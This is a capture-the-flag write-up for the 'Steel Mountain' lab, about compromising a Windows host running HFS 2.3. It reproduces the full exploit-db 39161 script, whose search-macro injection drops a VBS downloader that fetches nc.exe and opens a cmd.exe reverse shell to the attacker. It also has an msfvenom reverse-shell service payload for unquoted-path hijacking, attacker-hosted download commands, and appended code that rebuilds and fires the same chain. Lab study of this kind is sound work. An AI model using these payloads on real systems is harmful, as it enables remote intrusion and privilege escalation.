# Steel Mountain

[TOC]

## Initial Access

> Scan the machine with nmap. What is the other port running a web server on?

![](https://i.imgur.com/VrTEQvn.png)

---

> Take a look at the other web server. What file server is running?

![](https://i.imgur.com/DtcVbiW.png)

---

> What is the CVE number to exploit this file server?

![](https://i.imgur.com/Vs6KR7C.png)

---

> Use Metasploit to get an initial shell. What is the user flag?

![](https://i.imgur.com/fjlhUZa.png)

---

The manual exploit (the exploit-db script reproduced in full under *Access and Escalation Without Metasploit* below) delivers its payloads to the remote host as plain HTTP requests, so it only needs `urllib`:

```py
import urllib2   # Python 2; the python3 version below aliases urllib.request as urllib2
```

Every request abuses the HFS `search` parameter: the `%00` terminates the search string early, and the `{. ... .}` macro that follows it is evaluated by the server's template engine. The chain has three stages.

### Stage 1: VBS script that downloads nc.exe onto the target

`script_create()` uses the `save` macro to write a VBScript downloader to `C:\Users\Public\script.vbs`:

```py
def script_create():
    urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")
```

`save` is `"save|"` followed by the target path, a `|`, and the percent-encoded script (`%20` is a space, `%0D%0A` a line break, `%22` a double quote, `%5C` a backslash):

```
"C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
```

Decoded, the script fetches `http://<ip_addr>/nc.exe` with `Microsoft.XMLHTTP` and writes the response body to `C:\Users\Public\nc.exe` through an `Adodb.Stream` in binary mode, overwriting any existing file. This is why the attacker must already be serving `nc.exe` over HTTP.

### Stage 2: run the script to fetch nc.exe

`execute_script()` uses the `exec` macro to run the downloader with `cscript.exe`:

```py
def execute_script():
    urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")
```

```py
ip_addr = "192.168.44.128"  # local IP address (hosts nc.exe and receives the shell)
local_port = "443"          # local port the listener waits on
```

```py
vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
exe = "exec|"+vbs2
```

### Stage 3: reverse shell (nc)

`nc_run()` executes the downloaded netcat with `-e cmd.exe`, which connects back to our machine and hands us a shell in which we can run any command:

```py
def nc_run():
    urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")
```

```py
vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
exe1 = "exec|"+vbs3
```

![](https://i.imgur.com/Kmd7x3J.png)

## Privilege Escalation

> PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

Download the PowerUp script

![](https://i.imgur.com/uYFXZF6.png)

Upload the script to the target

![](https://i.imgur.com/lH9d1YU.png)

Load the PowerShell extension in meterpreter

```
load powershell
help
```

`.ps1` is the file extension of a PowerShell script.

Run the script

```
PS > . .\PowerUP.ps1
PS > Invoke-AllChecks
```

Unquoted Service Paths (the service runs as LocalSystem)

![](https://i.imgur.com/Q8yWWqu.png)

![](https://i.imgur.com/FFwSUHL.png)

The service path is vulnerable: it is unquoted and contains spaces, so Windows may resolve the executable to a file we control before it reaches the real binary.

![](https://i.imgur.com/jeBdV8a.png)

CanRestart being True means we can restart the service ourselves, so the hijacked binary runs without waiting for a reboot.

![](https://i.imgur.com/FcOas2j.png)

### Generate backdoor

```
msfvenom -p windows/shell_reverse_tcp LHOST=10.17.11.72 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
```

`-f exe-service` wraps the payload in a service executable, so the Service Control Manager accepts it instead of killing it for not responding. It is named `Advanced.exe` because that is the file the unquoted path resolves to before the real service binary; placing it there hijacks the service.

### Upload the backdoor to get LocalSystem privileges

![](https://i.imgur.com/sd6cUkk.png)

### Restart the service

![](https://i.imgur.com/cqHa0bj.png)

#### Got the root shell

![](https://i.imgur.com/ueF0YkH.png)

![](https://i.imgur.com/SFsNVUh.png)

## Access and Escalation Without Metasploit

https://www.exploit-db.com/exploits/39161

```py
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
# You may need to run it multiple times for success!
```

![](https://i.imgur.com/zaU6WIc.png)

![](https://i.imgur.com/uumcxz4.png)

```py
#!/usr/bin/python
# This is a modification of the original exploit : https://www.exploit-db.com/exploits/39161
# works with python3
import urllib.request as urllib2
import sys

try:
    # Stage 1: write the VBS downloader with the HFS 'save' macro
    def script_create():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

    # Stage 2: run the downloader with cscript via the 'exec' macro
    def execute_script():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

    # Stage 3: launch nc.exe for the reverse shell
    def nc_run():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

    ip_addr = "Your Local IP"  # local IP address (serves nc.exe on :8000, listener on local_port)
    local_port = "4444"        # Local Port number
    vbs = r"C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+":8000"+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save = "save|" + vbs
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe = "exec|"+vbs2
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
    exe1 = "exec|"+vbs3

    script_create()
    execute_script()
    nc_run()
except:
    print("""[.]Something went wrong..! Usage is :[.]
python exploit.py <Target IP address> <Target Port Number>
Don't forget to change the Local IP address and Port number on the script""")
```

---

![](https://i.imgur.com/Y2O2x4P.png)

---

### Initial Access

![](https://i.imgur.com/IUM2qnA.png)

### Enumeration (winPEASx86)

Download it with PowerShell's built-in `Invoke-WebRequest` (reference: https://adamtheautomator.com/powershell-download-file/):

```
Invoke-WebRequest -Uri http://10.17.11.72:8000/winPEASx86.exe -OutFile .\winPEASx86.exe
```

From the cmd.exe shell, wrap it in `powershell -c`:

```
powershell -c "Invoke-WebRequest -Uri http://10.17.11.72:8000/winPEASx86.exe -OutFile .\winPEASx86.exe "
```

`-OutFile .\winPEASx86.exe` is relative to the shell's current directory, so the file lands in bill's Startup folder:

```
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winPEASx86.exe
```

![](https://i.imgur.com/OZMkblw.png)

![](https://i.imgur.com/8mTyBDp.png)

### Privilege escalation (path hijack)

Drop the backdoor into the unquoted service path, then stop and start the service with `sc.exe` so the SCM launches our binary as LocalSystem:

```
cd C:\Program Files (x86)\IObit\
powershell -c "Invoke-WebRequest -Uri http://10.17.11.72:8000/Advanced.exe -OutFile .\Advanced.exe "
```

```
powershell -c "sc.exe stop AdvancedSystemCareService9"
powershell -c "sc.exe start AdvancedSystemCareService9"
```

![](https://i.imgur.com/Aa66fwz.png)
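The three `?search=%00{.+...+.}` requests from the initial-access exploit are easier to reason about when the payload is assembled from readable pieces rather than copied as one percent-encoded blob. The following is an added example, not the page's exploit or the exploit-db script: it builds the same `save`/`exec` macro chain (write the VBS downloader, run it with `cscript`, launch `nc.exe`) with `urllib.parse.quote`, decodes a macro back into plain text so a blob can be audited before it is fired, and sends nothing unless `send_chain()` is called. The target and attacker addresses, the port 8000 web server hosting `nc.exe`, and all function names are assumptions.

```python
"""Build and decode HFS 2.3 'search' macro payloads (added example, not the page's code)."""
import urllib.request
from urllib.parse import quote, unquote

# Readable form of the downloader the exploit writes to C:\Users\Public\script.vbs.
# {lhost}/{lport_http} are filled in by build_chain(); CRLF endings match the blob.
VBS_DOWNLOADER = "\r\n".join([
    'dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")',
    'dim bStrm: Set bStrm = createobject("Adodb.Stream")',
    'xHttp.Open "GET", "http://{lhost}:{lport_http}/nc.exe", False',
    "xHttp.Send",
    "",
    "with bStrm",
    "    .type = 1 '//binary",
    "    .open",
    "    .write xHttp.responseBody",
    '    .savetofile "C:\\Users\\Public\\nc.exe", 2 \'//overwrite',
    "end with",
])


def search_url(host, port, macro):
    """Wrap an HFS macro in the injectable search parameter.

    The %00 ends the search string early so the template engine parses the
    {. ... .} macro after it; the '+' decodes to a space before the macro name,
    exactly as in exploit-db 39161."""
    return f"http://{host}:{port}/?search=%00{{.+{macro}.}}"


def save_macro(remote_path, content):
    """{.save|file|data.}: write data to a file on the HFS host."""
    return "save|" + remote_path + "|" + quote(content, safe="")


def exec_macro(command):
    """{.exec|command.}: run a command on the HFS host."""
    return "exec|" + quote(command, safe="")


def decode_macro(macro):
    """Split a save/exec macro into [name, arg1, arg2...] with the percent-encoding
    removed, so a blob copied from somewhere can be read before it is used."""
    parts = macro.split("|")
    return [parts[0]] + [unquote(p) for p in parts[1:]]


def build_chain(target, tport, lhost, lport, lport_http=8000):
    """The three requests, in order. lport_http is the attacker's web server that
    must already be hosting nc.exe (e.g. python3 -m http.server 8000)."""
    vbs = VBS_DOWNLOADER.format(lhost=lhost, lport_http=lport_http)
    macros = [
        save_macro(r"C:\Users\Public\script.vbs", vbs),
        exec_macro(r"cscript.exe C:\Users\Public\script.vbs"),
        exec_macro(rf"C:\Users\Public\nc.exe -e cmd.exe {lhost} {lport}"),
    ]
    return [search_url(target, tport, m) for m in macros]


def send_chain(urls, timeout=10):
    """Fire the requests in order. HFS sometimes needs the chain repeated (the
    exploit-db note says so); a failed request is reported, not fatal."""
    for url in urls:
        try:
            urllib.request.urlopen(url, timeout=timeout)
        except OSError as err:
            print("request failed:", url, err)


if __name__ == "__main__":
    # Assumed addresses: HFS on 10.10.10.10:8080, attacker on 10.0.0.5 listening on 4444.
    for url in build_chain("10.10.10.10", 8080, "10.0.0.5", 4444):
        print(url)
    # To actually run it: send_chain(build_chain(...)) with nc -lvnp 4444 waiting.
```

Running it without `send_chain()` prints the three URLs, which is a convenient way to check the encoding against what a proxy or the HFS log shows. Note that `quote()` also escapes `(` and `)`, so the output differs cosmetically from the blob in the original script but decodes to the same VBS.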
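PowerUp flags `AdvancedSystemCareService9` because its ImagePath is unquoted and contains spaces, and the path-hijack section above drops `Advanced.exe` into `C:\Program Files (x86)\IObit\` for exactly that reason. The following added example (not PowerUp's or winPEAS's code) reproduces the check offline in Python: it lists the files Windows' loader would try, in order, before reaching the intended binary, and keeps the ones whose parent directory is writable. The sample ImagePaths and the writable-directory model are constructed for the example; the real service path is only visible in the screenshots, so the IObit one below is an assumption modelled on the commands above.

```python
"""Unquoted service path analysis (added example, not PowerUp's implementation)."""
import ntpath
import re

# Constructed sample services. The first is modelled on the writeup's target and
# is an assumption; the other two show cases that are not exploitable.
SAMPLE_SERVICES = {
    "AdvancedSystemCareService9": r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe",
    "QuotedSvc": r'"C:\Program Files\Vendor\Quoted Service\svc.exe" -k run',
    "NoSpaceSvc": r"C:\Windows\System32\svchost.exe -k netsvcs",
}


def binary_part(image_path):
    """Return the ImagePath up to and including the first '.exe'.

    Arguments after the executable do not take part in the loader's search."""
    match = re.match(r"(.*?\.exe)", image_path, re.IGNORECASE)
    return match.group(1) if match else image_path


def candidate_binaries(image_path):
    """Files CreateProcess tries, in order, before the intended binary.

    For an unquoted path with spaces the loader treats each space as a possible
    end of the executable name and appends .exe. A quoted ImagePath, or one
    whose executable part has no spaces, yields no candidates."""
    if image_path.lstrip().startswith('"'):
        return []
    words = binary_part(image_path).split(" ")
    return [" ".join(words[:i]) + ".exe" for i in range(1, len(words))]


def hijack_targets(image_path, dir_is_writable):
    """Candidates whose parent directory the predicate reports as writable.

    On the target this is an ACL check (icacls / Get-Acl); here it is injected
    so the logic can be exercised offline with a constructed model."""
    return [c for c in candidate_binaries(image_path)
            if dir_is_writable(ntpath.dirname(c))]


def audit(services, dir_is_writable):
    """Map service name -> exploitable drop paths, for services that have any."""
    report = {}
    for name, image_path in services.items():
        targets = hijack_targets(image_path, dir_is_writable)
        if targets:
            report[name] = targets
    return report


if __name__ == "__main__":
    # Constructed ACL model: only the IObit directory is writable by our user,
    # which is the situation the writeup exploits.
    writable_dirs = {r"C:\Program Files (x86)\IObit"}
    for svc, targets in audit(SAMPLE_SERVICES, lambda d: d in writable_dirs).items():
        print(svc)
        for path in targets:
            print("  drop the exe-service payload as:", path)
```

The order of `candidate_binaries()` matters: `C:\Program.exe` and `C:\Program Files.exe` are tried first, but writing to `C:\` normally needs administrator rights, so the first candidate in a user-writable directory is the one to use, which here is `...\IObit\Advanced.exe`, matching the `msfvenom -o Advanced.exe` name in the writeup. Restarting the service (or rebooting, if CanRestart were false) is still required for the loader to pick the file up.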